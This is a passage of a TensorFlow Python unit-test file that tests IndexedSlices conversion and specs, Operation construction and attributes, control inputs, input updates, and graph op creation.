    x = ops.IndexedSlices(values, indices)
    with self.assertRaises(ValueError):
      tensor = ops.convert_to_tensor(x, name="tensor")
    self.assertEqual(tensor_shape.TensorShape(None), x.shape)
    dense_shape = constant_op.constant([3, 2])
    y = ops.IndexedSlices(values, indices, dense_shape)
    tensor = ops.convert_to_tensor(y, name="tensor")
    self.assertAllEqual(tensor.shape, y.shape)
    # Row 1 was not indexed, so it densifies to zeros.
    self.assertAllEqual(self.evaluate(tensor), [[2, 3], [0, 0], [5, 7]])
  @test_util.run_gpu_only
  def testEagerCopy(self):
    with context.eager_mode():
      var = variables.Variable([[0.0], [0.0], [0.0], [0.0]], name="tensor")
      with backprop.GradientTape() as tape:
        a = array_ops.gather(array_ops.gather(var, [0, 1]), [0, 1])
        b = array_ops.gather(array_ops.gather(var, [2, 3]), [0, 1])
        r = special_math_ops.einsum("ij,ij->i", a, b)
      g = tape.gradient(r, [var])[0]
      # The gradient may come back sparse (IndexedSlices) or dense.
      values = g.values if isinstance(g, ops.IndexedSlices) else g
      self.assertAllEqual(values.get_shape(), [4, 1])
  def testNegation(self):
    # Unary minus negates values and leaves indices untouched.
    values = constant_op.constant([2, 3, 5, 7], shape=[2, 2])
    indices = constant_op.constant([0, 2])
    x = -ops.IndexedSlices(values, indices)
    self.assertAllEqual(x.values, [[-2, -3], [-5, -7]])
    self.assertAllEqual(x.indices, [0, 2])
  def testScalarMul(self):
    # scalar_mul scales values only; indices stay the same.
    values = constant_op.constant([2, 3, 5, 7], shape=[2, 2])
    indices = constant_op.constant([0, 2])
    x = math_ops.scalar_mul(-2, ops.IndexedSlices(values, indices))
    self.assertAllEqual(x.values, [[-4, -6], [-10, -14]])
    self.assertAllEqual(x.indices, [0, 2])
@test_util.run_all_in_graph_and_eager_modes
class IndexedSlicesSpecTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def assertAllTensorsEqual(self, list1, list2):
self.assertLen(list1, len(list2))
for (t1, t2) in zip(list1, list2):
self.assertAllEqual(t1, t2)
def testConstruction(self):
spec1 = indexed_slices.IndexedSlicesSpec()
self.assertIsNone(spec1._shape.rank)
self.assertEqual(spec1._values_dtype, dtypes.float32)
self.assertEqual(spec1._indices_dtype, dtypes.int64)
self.assertIsNone(spec1._dense_shape_dtype)
self.assertEqual(spec1._indices_shape.as_list(), [None])
spec2 = indexed_slices.IndexedSlicesSpec([None, None], dtypes.string,
dtypes.int32, dtypes.int64, [10])
self.assertEqual(spec2._shape.as_list(), [None, None])
self.assertEqual(spec2._values_dtype, dtypes.string)
self.assertEqual(spec2._indices_dtype, dtypes.int32)
self.assertEqual(spec2._dense_shape_dtype, dtypes.int64)
self.assertEqual(spec2._indices_shape.as_list(), [10])
def testValueType(self):
spec1 = indexed_slices.IndexedSlicesSpec()
self.assertEqual(spec1.value_type, ops.IndexedSlices)
@parameterized.parameters([
(indexed_slices.IndexedSlicesSpec(),
(tensor_shape.TensorShape(None), dtypes.float32, dtypes.int64, None,
tensor_shape.TensorShape([None]))),
(indexed_slices.IndexedSlicesSpec(shape=[5, None, None]),
(tensor_shape.TensorShape([5, None, None]), dtypes.float32,
dtypes.int64, None, tensor_shape.TensorShape([None]))),
(indexed_slices.IndexedSlicesSpec(
dtype=dtypes.int32, dense_shape_dtype=dtypes.int64),
(tensor_shape.TensorShape(None), dtypes.int32, dtypes.int64,
dtypes.int64, tensor_shape.TensorShape([None]))),
(indexed_slices.IndexedSlicesSpec(indices_shape=[100]),
(tensor_shape.TensorShape(None), dtypes.float32, dtypes.int64, None,
tensor_shape.TensorShape([100]))),
]) # pyformat: disable
def testSerialize(self, spec, expected):
serialization = spec._serialize()
# TensorShape has an unconventional definition of equality, so we can't use
# assertEqual directly here. But repr() is deterministic and lossless for
# the expected values, so we can use that instead.
self.assertEqual(repr(serialization), repr(expected))
  @parameterized.parameters([
      (indexed_slices.IndexedSlicesSpec(dtype=dtypes.string), (
          tensor_spec.TensorSpec(None, dtypes.string),
          tensor_spec.TensorSpec([None], dtypes.int64),
      )),
      (indexed_slices.IndexedSlicesSpec(
          dtype=dtypes.string, dense_shape_dtype=dtypes.int32), (
              tensor_spec.TensorSpec(None, dtypes.string),
              tensor_spec.TensorSpec([None], dtypes.int64),
              tensor_spec.TensorSpec([None], dtypes.int32),
          )),
      (indexed_slices.IndexedSlicesSpec(
          shape=[5, 10, 15], dense_shape_dtype=dtypes.int32), (
              tensor_spec.TensorSpec([None, 10, 15], dtypes.float32),
              tensor_spec.TensorSpec([None], dtypes.int64),
              tensor_spec.TensorSpec([3], dtypes.int32),
          )),
      (indexed_slices.IndexedSlicesSpec(
          shape=[5, 10, 15], dense_shape_dtype=dtypes.int32,
          indices_shape=[20]), (
              tensor_spec.TensorSpec([20, 10, 15], dtypes.float32),
              tensor_spec.TensorSpec([20], dtypes.int64),
              tensor_spec.TensorSpec([3], dtypes.int32),
          )),
  ])
  def testComponentSpecs(self, spec, expected):
    """_component_specs expands to TensorSpecs for values/indices[/dense_shape]."""
    self.assertEqual(spec._component_specs, expected)
  @parameterized.parameters([
      {
          "spec": indexed_slices.IndexedSlicesSpec(),
          "values": [3.0, 5.0],
          "indices": [5, 10]
      },
      {
          "spec":
              indexed_slices.IndexedSlicesSpec(dense_shape_dtype=dtypes.int32),
          "values": [3.0, 5.0],
          "indices": [5, 10],
          "dense_shape": [100]
      },
  ])
  def testToFromComponents(self, spec, indices, values, dense_shape=None):
    """Round-trips an IndexedSlices through _to_components/_from_components.

    NOTE(review): `ops.IndexedSlices(indices, values, ...)` below passes the
    local `indices` into the constructor's first (values) slot and vice versa,
    so the local names look swapped relative to the constructor's parameter
    order; the assertions are self-consistent with that swap, so behavior is
    still verified -- but confirm intent before renaming anything here.
    """
    x = ops.IndexedSlices(indices, values, dense_shape)
    actual_components = spec._to_components(x)
    if dense_shape is None:
      self.assertAllTensorsEqual(actual_components, [indices, values])
    else:
      self.assertAllTensorsEqual(actual_components,
                                 [indices, values, dense_shape])
    st_reconstructed = spec._from_components(actual_components)
    self.assertAllEqual(x.indices, st_reconstructed.indices)
    self.assertAllEqual(x.values, st_reconstructed.values)
    if dense_shape is None:
      self.assertIsNone(st_reconstructed.dense_shape)
    else:
      self.assertAllEqual(x.dense_shape, st_reconstructed.dense_shape)
@test_util.run_v1_only("IndexedSlicesValue is deprecated in v2")
def testFromNumpyComponents(self):
indices = np.array([3, 8])
values = np.array([1.0, 9.0])
dense_shape = np.array([100])
spec1 = indexed_slices.IndexedSlicesSpec(dense_shape_dtype=dtypes.int32)
st1 = spec1._from_components((values, indices, dense_shape))
self.assertIsInstance(st1, indexed_slices.IndexedSlicesValue)
self.assertAllEqual(st1.indices, indices)
self.assertAllEqual(st1.values, values)
self.assertAllEqual(st1.dense_shape, dense_shape)
spec2 = indexed_slices.IndexedSlicesSpec()
st2 = spec2._from_components((values, indices))
self.assertIsInstance(st2, indexed_slices.IndexedSlicesValue)
self.assertAllEqual(st2.indices, indices)
self.assertAllEqual(st2.values, values)
self.assertIsNone(st2.dense_shape)
class NodeDefConstructorTest(test_util.TensorFlowTestCase):
  """Tests for the ops._NodeDef convenience constructor."""

  def testNoArgs(self):
    # Only op type and name supplied; the resulting proto carries just those.
    nd = ops._NodeDef("None", "bar")
    self.assertProtoEquals("op: 'None' name: 'bar'", nd)
def _apply_op(g, *args, **kwargs):
op = g.create_op(*args, **kwargs)
if len(op.outputs) == 1:
return op.outputs[0]
else:
return op.outputs
class OperationTest(test_util.TensorFlowTestCase):
  """Tests for ops.Operation: construction, inputs/outputs/consumers, attrs,
  device placement, and the private graph-mutation APIs
  (_add_control_input, _update_input, _add_while_inputs, ...)."""

  @test_util.run_deprecated_v1
  def testNoInputs(self):
    # An op with two outputs and no inputs: check tensor dtypes, value
    # indices, consumer lists, and node_def rendering.
    op = test_ops.float_output_string_output(name="myop").a.op
    self.assertEqual(2, len(op.values()))
    self.assertEqual(0, len(op.inputs))
    self.assertEqual("myop", op.name)
    float_t, label_str_t = op.values()
    self.assertEqual(dtypes.float32, float_t.dtype)
    self.assertEqual(op, float_t.op)
    self.assertEqual(0, float_t._value_index)
    self.assertEqual(0, len(float_t.consumers()))
    self.assertEqual("myop", float_t._as_node_def_input())
    self.assertEqual(dtypes.string, label_str_t.dtype)
    self.assertEqual(op, label_str_t.op)
    self.assertEqual(1, label_str_t._value_index)
    self.assertEqual(0, len(label_str_t.consumers()))
    self.assertEqual("myop:1", label_str_t._as_node_def_input())
    self.assertProtoEquals("op:'FloatOutputStringOutput' name:'myop'",
                           op.node_def)
  @test_util.run_deprecated_v1
  def testNoOutputs(self):
    op1 = test_ops.float_output(name="myop1").op
    float_t, = op1.values()
    op2 = test_ops.float_input(float_t, name="myop2")
    self.assertEqual(0, len(op2.values()))
    self.assertEqual(1, len(op2.inputs))
    self.assertIs(float_t, op2.inputs[0])
    self.assertEqual(1, len(float_t.consumers()))
    self.assertEqual(op2, float_t.consumers()[0])
    self.assertProtoEquals("op:'FloatOutput' name:'myop1'", op1.node_def)
    self.assertProtoEquals("op:'FloatInput' name:'myop2' input:'myop1'",
                           op2.node_def)
  @test_util.run_deprecated_v1
  def testInputsAndOutputs(self):
    op1 = test_ops.float_output(name="myop1").op
    self.assertEqual(1, len(op1.values()))
    float1_t, = op1.values()
    op2 = test_ops.float_output_string_output(name="myop2").a.op
    self.assertEqual(2, len(op2.values()))
    float2_t, label2_str_t = op2.values()
    # Note that we consume label2_str_t twice here.
    op3 = test_ops.foo2(float1_t, label2_str_t, label2_str_t, name="myop3").d.op
    self.assertEqual(2, len(op3.values()))
    self.assertEqual(1, len(float1_t.consumers()))
    self.assertEqual(op3, float1_t.consumers()[0])
    self.assertEqual(0, len(float2_t.consumers()))
    self.assertEqual(2, len(label2_str_t.consumers()))
    self.assertEqual(op3, label2_str_t.consumers()[0])
    self.assertEqual(op3, label2_str_t.consumers()[1])
    self.assertProtoEquals("""
    op:'Foo2' name:'myop3'
    input:'myop1' input:'myop2:1' input:'myop2:1'
    """, op3.node_def)
  def testDeviceObject(self):
    # Device can be set from a string or a pydev.DeviceSpec object.
    op = ops.Operation(ops._NodeDef("None", "myop"), ops.Graph(), [], [])
    op._set_device("/job:goo/device:GPU:0")
    self.assertProtoEquals(
        "op:'None' name:'myop' device:'/job:goo/device:GPU:0' ", op.node_def)
    op = ops.Operation(ops._NodeDef("None", "op2"), ops.Graph(), [], [])
    op._set_device(
        pydev.DeviceSpec(
            job="muu", device_type="CPU", device_index=0))
    self.assertProtoEquals(
        "op:'None' name:'op2' device:'/job:muu/device:CPU:0'", op.node_def)
  def testReferenceInput(self):
    g = ops.Graph()
    op1 = ops.Operation(
        ops._NodeDef("RefOutputFloatOutput", "op1"), g, [],
        [dtypes.float32_ref, dtypes.float32])
    self.assertProtoEquals("op:'RefOutputFloatOutput' name:'op1'", op1.node_def)
    self.assertEqual([], list(op1.inputs))
    ref_t, nonref_t = op1.values()
    # NOTE(mrry): Must specify input_types to preserve ref-typed input.
    op2 = ops.Operation(
        ops._NodeDef("RefInputFloatInput", "op2"),
        g, [ref_t, nonref_t], [],
        input_types=[dtypes.float32_ref, dtypes.float32])
    self.assertProtoEquals(
        "op:'RefInputFloatInput' name:'op2' input:'op1' input:'op1:1'",
        op2.node_def)
    self.assertEqual([ref_t, nonref_t], list(op2.inputs))
    op3 = ops.Operation(
        ops._NodeDef("TwoFloatInputs", "op3"), g, [ref_t, nonref_t], [])
    self.assertProtoEquals(
        "op:'TwoFloatInputs' name:'op3' input:'op1' input:'op1:1'",
        op3.node_def)
  def testInvalidNames(self):
    # Op names must match the node-name grammar; these all violate it.
    g = ops.Graph()
    with self.assertRaises(ValueError):
      ops.Operation(ops._NodeDef("op", ""), g)
    with self.assertRaises(ValueError):
      ops.Operation(ops._NodeDef("op", "_invalid"), g)
    with self.assertRaises(ValueError):
      ops.Operation(ops._NodeDef("op", "-invalid"), g)
    with self.assertRaises(ValueError):
      ops.Operation(ops._NodeDef("op", "/invalid"), g)
    with self.assertRaises(ValueError):
      ops.Operation(ops._NodeDef("op", "invalid:0"), g)
  @test_util.run_deprecated_v1
  def testNoShapeFunction(self):
    op = test_ops.a()
    self.assertEqual(tensor_shape.unknown_shape(), op.get_shape())
  @test_util.run_in_graph_and_eager_modes
  def testConvertToTensorNestedArray(self):
    values = [[2], [3], [5], [7]]
    tensor = ops.convert_to_tensor(values)
    self.assertAllEqual((4, 1), tensor.get_shape().as_list())
    self.assertAllEqual(values, self.evaluate(tensor))
  def testShapeTuple(self):
    with self.cached_session():
      c = constant_op.constant(1)
      self.assertEqual(c._shape_tuple(), ())  # pylint: disable=protected-access
  def testConvertToTensorEager(self):
    with context.eager_mode():
      t = constant_op.constant(1)
      self.assertTrue(isinstance(t, ops.EagerTensor))
      converted = ops.convert_to_tensor(t)
      self.assertTrue(isinstance(converted, ops.EagerTensor))
      converted = ops.convert_to_tensor(1)
      self.assertTrue(isinstance(converted, ops.EagerTensor))
  @test_util.run_in_graph_and_eager_modes
  def testConvertToTensorNestedTuple(self):
    values = ((2,), (3,), (5,), (7,))
    tensor = ops.convert_to_tensor(values)
    self.assertAllEqual((4, 1), tensor.get_shape().as_list())
    self.assertAllEqual(values, self.evaluate(ops.convert_to_tensor(values)))
  @test_util.run_in_graph_and_eager_modes
  def testConvertToTensorNestedTensors(self):
    values = ((2,), (3,), (5,), (7,))
    tensor = ops.convert_to_tensor(
        [constant_op.constant(row) for row in values])
    self.assertAllEqual((4, 1), tensor.get_shape().as_list())
    self.assertAllEqual(values, self.evaluate(tensor))
    tensor = ops.convert_to_tensor(
        [[constant_op.constant(v) for v in row] for row in values])
    self.assertAllEqual((4, 1), tensor.get_shape().as_list())
    self.assertAllEqual(values, self.evaluate(tensor))
  @test_util.run_in_graph_and_eager_modes
  def testConvertToTensorNestedMix(self):
    values = ([2], (3,), [constant_op.constant(5)], constant_op.constant([7]))
    tensor = ops.convert_to_tensor(values)
    self.assertAllEqual((4, 1), tensor.get_shape().as_list())
    self.assertAllEqual(((2,), (3,), (5,), (7,)), self.evaluate(tensor))
  @test_util.run_in_graph_and_eager_modes
  def testConvertToTensorPreferred(self):
    values = [2, 3, 5, 7]
    tensor = ops.convert_to_tensor(values, preferred_dtype=dtypes.float32)
    self.assertEqual(dtypes.float32, tensor.dtype)
    # Convert empty tensor to anything.
    values = []
    tensor = ops.convert_to_tensor(values, preferred_dtype=dtypes.int64)
    self.assertEqual(dtypes.int64, tensor.dtype)
    # The preferred dtype is a type error and will convert to
    # float32 instead.
    values = [1.23]
    tensor = ops.convert_to_tensor(values, preferred_dtype=dtypes.int64)
    self.assertEqual(dtypes.float32, tensor.dtype)
  @test_util.run_in_graph_and_eager_modes
  def testConvertToInvalidTensorType(self):
    with self.assertRaises(TypeError):
      # Forcing an invalid dtype should fail with a type error.
      values = [1.23]
      ops.convert_to_tensor(values, dtype=dtypes.int64)
  @test_util.run_in_graph_and_eager_modes
  def testConvertToLongLongTensorType(self):
    tensor = ops.convert_to_tensor(
        # Get a numpy array of dtype NPY_LONGLONG
        np.prod(constant_op.constant([1])._shape_tuple()),
        dtype=dtypes.int64)
    self.assertEqual(dtypes.int64, tensor.dtype)
  @test_util.run_in_graph_and_eager_modes
  def testConvertToTensorFromInvalidTensor(self):
    tensor = constant_op.constant(42.0, dtype=dtypes.float32)
    with self.assertRaises(ValueError):
      ops.convert_to_tensor(tensor, dtype=dtypes.int32)
  @test_util.run_in_graph_and_eager_modes
  def testConvertToTensorProtocol(self):
    # Any object implementing __tf_tensor__ can be converted.
    class TensorCompatible:
      def __tf_tensor__(self, dtype=None, name=None):
        return constant_op.constant((1, 2, 3), dtype=dtype, name=name)
    tc = TensorCompatible()
    tensor = ops.convert_to_tensor(tc, dtype=dtypes.int32)
    self.assertEqual(tensor.dtype, dtypes.int32)
    self.assertAllEqual((1, 2, 3), self.evaluate(tensor))
  @test_util.run_deprecated_v1
  def testNoConvert(self):
    # Operation cannot be converted to Tensor.
    op = control_flow_ops.no_op()
    with self.assertRaisesRegex(TypeError,
                                "can't convert Operation '.+' to Tensor"):
      ops.convert_to_tensor(op)
  def testStr(self):
    node_def = ops._NodeDef("None", "op1")
    op = ops.Operation(node_def, ops.Graph(), [], [dtypes.float32])
    self.assertEqual(str(node_def), str(op))
  def testRepr(self):
    op = ops.Operation(
        ops._NodeDef("None", "op1"), ops.Graph(), [], [dtypes.float32])
    self.assertEqual("<tf.Operation 'op1' type=None>", repr(op))
  @test_util.run_deprecated_v1
  def testGetAttr(self):
    # Exercises get_attr for every attr value kind the op registry supports.
    op = test_ops.default_attrs()
    self.assertEqual(op.get_attr("string_val"), b"abc")
    self.assertEqual(op.get_attr("string_list_val"), [b"abc", b""])
    self.assertEqual(op.get_attr("int_val"), 123)
    self.assertEqual(op.get_attr("int_list_val"), [1, 2, 3])
    self.assertEqual(op.get_attr("float_val"), 10.0)
    self.assertEqual(op.get_attr("float_list_val"), [10.0])
    self.assertEqual(op.get_attr("bool_val"), True)
    self.assertEqual(op.get_attr("bool_list_val"), [True, False])
    self.assertEqual(op.get_attr("shape_val"),
                     tensor_shape.as_shape([2, 1]).as_proto())
    self.assertEqual(op.get_attr("shape_list_val"),
                     [tensor_shape.as_shape([]).as_proto(),
                      tensor_shape.as_shape([1]).as_proto()])
    self.assertEqual(op.get_attr("tensor_val"),
                     tensor_util.make_tensor_proto(1, dtypes.int32))
    self.assertEqual(op.get_attr("tensor_list_val"),
                     [tensor_util.make_tensor_proto(1, dtypes.int32)])
    type_val = op.get_attr("type_val")
    # First check that type_val is a DType, because the assertEqual will work
    # no matter what since DType overrides __eq__
    self.assertIsInstance(type_val, dtypes.DType)
    self.assertEqual(type_val, dtypes.int32)
    type_list_val = op.get_attr("type_list_val")
    self.assertTrue(all(isinstance(x, dtypes.DType) for x in type_list_val))
    self.assertEqual(type_list_val, [dtypes.int32, dtypes.float32])
    @function.Defun(dtypes.float32, func_name="MyFunc")
    def func(x):
      return x
    op = test_ops.func_attr(func)
    self.assertEqual(op.get_attr("f"),
                     attr_value_pb2.NameAttrList(name="MyFunc"))
    # Try fetching missing attr
    with self.assertRaisesRegex(
        ValueError, "Operation 'FuncAttr' has no attr named 'FakeAttr'."):
      op.get_attr("FakeAttr")
  # TODO(b/65162920): remove this test when users who are directly mutating the
  # node_def have been updated to proper usage.
  @test_util.run_deprecated_v1
  def testSetAttr(self):
    op = test_ops.int_attr().op
    op._set_attr("foo", attr_value_pb2.AttrValue(i=2))
    # TODO(skyewm): add node_def check
    self.assertEqual(op.get_attr("foo"), 2)
  # TODO(nolivia): test all error cases
  def testAddControlInput(self):
    # Duplicate control inputs are deduplicated.
    with ops.Graph().as_default():
      x = constant_op.constant(1).op
      y = constant_op.constant(2).op
      z = constant_op.constant(3).op
    z._add_control_input(x)  # pylint: disable=protected-access
    self.assertEqual(z.control_inputs, [x])
    z._add_control_input(x)  # pylint: disable=protected-access
    self.assertEqual(z.control_inputs, [x])
    z._add_control_inputs([x, y, y])  # pylint: disable=protected-access
    self.assertEqual(z.control_inputs, [x, y])
    self.assertEqual(x._control_outputs, [z])
  @test_util.run_deprecated_v1
  def testRemoveAllControlInputs(self):
    a = constant_op.constant(1)
    with ops.control_dependencies([a]):
      b = constant_op.constant(2)
    c = constant_op.constant(3)
    d = constant_op.constant(4)
    e = constant_op.constant(5)
    with ops.control_dependencies([a, c]):
      f = d + e
    self.assertEqual(a.op.control_inputs, [])
    self.assertEqual(b.op.control_inputs, [a.op])
    self.assertEqual(f.op.control_inputs, [a.op, c.op])
    a.op._remove_all_control_inputs()  # pylint: disable=protected-access
    self.assertEqual(a.op.control_inputs, [])
    b.op._remove_all_control_inputs()  # pylint: disable=protected-access
    self.assertEqual(b.op.control_inputs, [])
    f.op._remove_all_control_inputs()  # pylint: disable=protected-access
    self.assertEqual(f.op.control_inputs, [])
    self.assertEqual(list(f.op.inputs), [d, e])
  @test_util.run_deprecated_v1
  def testControlInputCycle(self):
    # A control-input cycle is only detected at run time, not at build time.
    graph = ops.Graph()
    with graph.as_default():
      z = constant_op.constant(0)
      x = constant_op.constant(1)
      y = constant_op.constant(2)
      y.op._add_control_input(z.op)  # pylint: disable=protected-access
      y.op._add_control_input(x.op)  # pylint: disable=protected-access
      x.op._add_control_input(y.op)  # pylint: disable=protected-access
    with self.session(graph=graph) as sess:
      with self.assertRaisesRegex(
          errors.InvalidArgumentError,
          "Graph is invalid, contains a cycle with 2 nodes"):
        self.evaluate(x)
  def testUpdateInput(self):
    g = ops.Graph()
    with g.as_default():
      x = constant_op.constant(1)
      y = constant_op.constant(2)
      z = x + y
    z.op._update_input(0, y)  # pylint: disable=protected-access
    self.assertEqual(list(z.op.inputs), [y, y])
    self.assertEqual(x.consumers(), [])
    self.assertEqual(y.consumers(), [z.op, z.op])
    with session.Session(graph=g) as sess:
      self.assertEqual(self.evaluate(z), 4)
    z.op._update_input(0, x)  # pylint: disable=protected-access
    self.assertEqual(list(z.op.inputs), [x, y])
    self.assertEqual(x.consumers(), [z.op])
    self.assertEqual(y.consumers(), [z.op])
    with session.Session(graph=g) as sess:
      self.assertEqual(self.evaluate(z), 3)
    z.op._update_input(1, y)  # pylint: disable=protected-access
    self.assertEqual(list(z.op.inputs), [x, y])
    self.assertEqual(x.consumers(), [z.op])
    self.assertEqual(y.consumers(), [z.op])
    with session.Session(graph=g) as sess:
      self.assertEqual(self.evaluate(z), 3)
  def testUpdateInputGraphError(self):
    # _update_input rejects tensors from a different graph.
    g_0 = ops.Graph()
    g_1 = ops.Graph()
    with g_0.as_default():
      x = constant_op.constant(1)
    with g_1.as_default():
      y = constant_op.constant(2)
      z = y * 2
      with self.assertRaisesRegex(ValueError, "must be from the same graph"):
        z.op._update_input(0, x)  # pylint: disable=protected-access
  def testUpdateInputTypeError(self):
    # A dtype mismatch introduced by _update_input surfaces at run time.
    g = ops.Graph()
    with g.as_default():
      w = constant_op.constant(0)
      x = constant_op.constant("")
      y = constant_op.constant(1)
      z = y + w
      z.op._update_input(0, x)  # pylint: disable=protected-access
    with session.Session(graph=g) as sess:
      with self.assertRaisesRegex(
          errors.InvalidArgumentError,
          "Input 0 of node add was passed string from Const_1:0 incompatible "
          "with expected int32"):
        self.evaluate(z)
  def testUpdateInputShapeError(self):
    g = ops.Graph()
    with g.as_default():
      w = constant_op.constant(2, shape=[3, 1])
      x = constant_op.constant(0, shape=[3, 1])
      y = constant_op.constant(1, shape=[2, 2])
      z = w + x
    with self.assertRaisesRegex(
        errors.InvalidArgumentError,
        r"Cannot update edge, incompatible shapes: \[2,2\] and \[3,1\]"):
      z.op._update_input(0, y)  # pylint: disable=protected-access
  def testUpdateInputOutOfRange(self):
    g = ops.Graph()
    with g.as_default():
      x = constant_op.constant(1)
    with self.assertRaisesRegex(
        errors.OutOfRangeError,
        r"Cannot update edge. Input index \[1\] is greater than the number of "
        r"total inputs \[0\]."):
      x.op._update_input(1, x)  # pylint: disable=protected-access
  @test_util.enable_control_flow_v2
  @test_util.run_v1_only("b/120545219")
  def testAddWhileInput(self):
    @eager_function.defun
    def test():
      output = control_flow_ops.while_loop(lambda x: x < 3, lambda x: x + 1,
                                           [1])
      while_op = output.op
      self.assertEqual(while_op.type, "StatelessWhile")
      orig_num_inputs = len(while_op.inputs)
      # Make sure we can handle the while op having a control input.
      while_op._add_control_input(constant_op.constant(0).op)
      new_input1 = constant_op.constant(1.0)
      new_input2 = constant_op.constant(True)
      # Clear output shapes to bypass shape checking.
      while_op._set_shape_list_attr("output_shapes", [])
      while_op._set_type_list_attr("T", [t.dtype for t in while_op.inputs] +
                                   [new_input1.dtype, new_input2.dtype])
      while_op._add_while_inputs([new_input1, new_input2])
      # Can't add an edge beyond what's specified by "T"
      with self.assertRaises(errors.OutOfRangeError):
        while_op._add_while_inputs([new_input2])
      self.assertLen(while_op.inputs, orig_num_inputs + 2)  # pylint: disable=g-deprecated-assert
    test()
  @test_util.run_deprecated_v1
  def testOpDef(self):
    x = constant_op.constant(0)
    y = constant_op.constant(1)
    z = x + y
    self.assertEqual(x.op.op_def.name, "Const")
    self.assertLen(x.op.op_def.input_arg, 0)
    self.assertLen(x.op.op_def.output_arg, 1)
    self.assertRegex(z.op.op_def.name, "Add(V2)?")
    self.assertLen(z.op.op_def.input_arg, 2)
    self.assertLen(z.op.op_def.output_arg, 1)
  def testInputFromDifferentGraphError(self):
    g_0 = ops.Graph()
    g_1 = ops.Graph()
    with g_0.as_default():
      x = constant_op.constant(1)
    with g_1.as_default():
      y = constant_op.constant(2)
      with self.assertRaisesRegex(ValueError, "must be from the same graph"):
        y * x  # pylint: disable=pointless-statement
  def testInputsAreImmutable(self):
    g = ops.Graph()
    with g.as_default():
      x = test_ops.int_output()
      op = test_ops.int_input_int_output(x, name="myop").op
    with self.assertRaisesRegex(AttributeError,
                                "'tuple' object has no attribute 'append'"):
      op.inputs.append(None)
class CreateOpTest(test_util.TensorFlowTestCase):
  """Tests for Graph.create_op: node_def construction, device scopes,
  ref-typed inputs, and graph finalization."""

  def testNodeDefArgs(self):
    g = ops.Graph()
    op1 = g.create_op("FloatOutput", [], [dtypes.float32], None, name="myop1")
    with g.device("/device:GPU:0"):
      op2 = g.create_op(
          "FloatOutputStringOutput", [], [dtypes.float32, dtypes.string], None,
          name="myop2")
    op3 = g.create_op(
        "Foo3",
        [list(op1.values())[0], list(op2.values())[1], list(op2.values())[0]],
        [dtypes.float32, dtypes.int32],
        None,
        name="myop3")
    self.assertDeviceEqual(None, op1.device)
    self.assertDeviceEqual("/device:GPU:0", op2.device)
    self.assertDeviceEqual(None, op3.device)
    self.assertProtoEquals("name:'myop1' op:'FloatOutput'", op1.node_def)
    self.assertProtoEquals(
        "name:'myop2' op:'FloatOutputStringOutput' device:'/device:GPU:0'",
        op2.node_def)
    self.assertProtoEquals(
        "name:'myop3' input:'myop1' input:'myop2:1' input:'myop2' op:'Foo3'",
        op3.node_def)
  def testReferenceInput(self):
    g = ops.Graph()
    op1 = g.create_op(
        "RefOutputFloatOutput", [], [dtypes.float32_ref, dtypes.float32],
        name="op1")
    self.assertProtoEquals("op:'RefOutputFloatOutput' name:'op1'", op1.node_def)
    ref_t, nonref_t = op1.values()
    # NOTE(mrry): Must specify input_types to preserve ref-typed input.
    op2 = g.create_op(
        "RefInputFloatInput", [ref_t, nonref_t], [],
        input_types=[dtypes.float32_ref, dtypes.float32],
        name="op2")
    self.assertProtoEquals(
        "op:'RefInputFloatInput' name:'op2' input:'op1' input:'op1:1'",
        op2.node_def)
    op3 = g.create_op("TwoFloatInputs", [ref_t, nonref_t], [], name="op3")
    self.assertProtoEquals(
        "op:'TwoFloatInputs' name:'op3' input:'op1' input:'op1:1'",
        op3.node_def)
  def testFinalized(self):
    # create_op fails on a finalized graph and works again after unfinalize.
    g = ops.Graph()
    g.finalize()
    with self.assertRaises(RuntimeError):
      g.create_op("FloatOutput", [], [dtypes.float32], None, name="myop1")
    # Test unfinalize.
    g._unsafe_unfinalize()
    g.create_op("FloatOutput", [], [dtypes.float32], None, name="myop1")
# NOTE(skyewm): these cases test the private Graph._create_op_from_tf_operation
# method. Arguably we should only test the public APIs that depend on this
# method. However, this logic is complex and tricky, and it can be difficult to
# ascertain if we have adequate coverage (e.g. a graph may run successfully if
# the control flow context isn't set properly, but a more complicated use case
# that might not be obvious to test will fail). Thus we instead explicitly test
# the low-level behavior.
class CreateOpFromTFOperationTest(test_util.TensorFlowTestCase):
  """Tests for Graph._create_op_from_tf_operation and
  Graph._add_new_tf_operations, including interaction with v1 control-flow
  contexts (cond/while)."""

  @test_util.run_deprecated_v1
  def testBasic(self):
    g = ops.Graph()
    with g.as_default():
      x = test_ops.int_output()
      c_op = ops._create_c_op(
          g, ops._NodeDef("IntInputIntOutput", "myop"), [x], [])
      op = g._create_op_from_tf_operation(c_op)
    self.assertEqual(op.name, "myop")
    self.assertEqual(op.type, "IntInputIntOutput")
    self.assertLen(op.outputs, 1)
    self.assertEqual(op.outputs[0].shape, tensor_shape.unknown_shape())
    self.assertEqual(list(op.inputs), [x])
    self.assertEqual(op.control_inputs, [])
    self.assertEqual(op.graph, g)
    self.assertEqual(x.consumers(), [op])
    self.assertIsNotNone(op.traceback)
    self.assertEqual(g.get_operation_by_name("myop"), op)
    self.assertEqual(g.get_tensor_by_name("myop:0"), op.outputs[0])
  def testShape(self):
    g = ops.Graph()
    with g.as_default():
      x = constant_op.constant([[1, 2, 3], [4, 5, 6]])
      c_op = ops._create_c_op(g, ops._NodeDef("Identity", "myop"), [x], [])
      op = g._create_op_from_tf_operation(c_op)
    self.assertEqual(op.name, "myop")
    self.assertEqual(op.type, "Identity")
    self.assertLen(op.outputs, 1)
    self.assertEqual(op.outputs[0].shape, tensor_shape.TensorShape([2, 3]))
  def testUniqueName(self):
    # Names of later Python-created ops are uniquified against ops that were
    # added directly via the C API.
    g = ops.Graph()
    with g.as_default():
      c_op = ops._create_c_op(g, ops._NodeDef("IntOutput", "myop"), [], [])
      c_op2 = ops._create_c_op(g, ops._NodeDef("IntOutput", "myop_1"), [], [])
      op = g._create_op_from_tf_operation(c_op)
      op2 = g._create_op_from_tf_operation(c_op2)
      # Create ops with same names as op1 and op2. We expect the new names to be
      # uniquified.
      op3 = test_ops.int_output(name="myop").op
      op4 = test_ops.int_output(name="myop_1").op
    self.assertEqual(op.name, "myop")
    self.assertEqual(op2.name, "myop_1")
    self.assertEqual(op3.name, "myop_2")
    self.assertEqual(op4.name, "myop_1_1")
  @test_util.run_v1_only("b/120545219")
  def testCond(self):
    g = ops.Graph()
    with g.as_default():
      x = test_ops.int_output()
      def true_fn():
        ops._create_c_op(ops.get_default_graph(),
                         ops._NodeDef("IntInput", "cond/myop"), [x], [])
        new_ops = g._add_new_tf_operations()
